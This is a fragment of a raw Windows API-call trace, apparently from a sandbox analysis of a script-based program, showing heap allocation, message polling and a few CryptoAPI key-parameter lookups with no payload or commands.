[0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.790] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0039.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0039.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0039.790] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0039.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0039.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0039.791] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0039.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da328 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0039.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897d8 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0039.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0039.791] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0039.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0039.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0039.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0039.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0039.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0039.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0039.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0039.792] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0039.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0039.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0039.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0039.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0039.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0039.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0039.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0039.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0039.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0039.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0039.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0039.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0039.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0039.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0039.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0039.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0039.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.793] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0039.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0039.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0039.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0039.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0039.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0039.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0039.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0039.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0039.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0039.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0039.793] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0039.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0039.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0039.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0039.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0039.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0039.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.794] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0039.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0039.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.794] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0039.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0039.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0039.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0039.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0039.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0039.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0039.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0039.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0039.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0039.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0039.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0039.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0039.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0039.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0039.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0039.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0039.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0039.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0039.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0039.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0039.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0039.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0039.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0039.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0039.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0039.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0039.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0039.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0039.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0039.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0039.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0039.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0039.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0039.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0039.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0039.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0039.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0039.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0039.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0039.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0039.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0039.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0039.797] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0039.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0039.797] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da3c8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3c8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0039.797] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.798] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.798] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.798] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.798] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.798] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.798] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.798] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 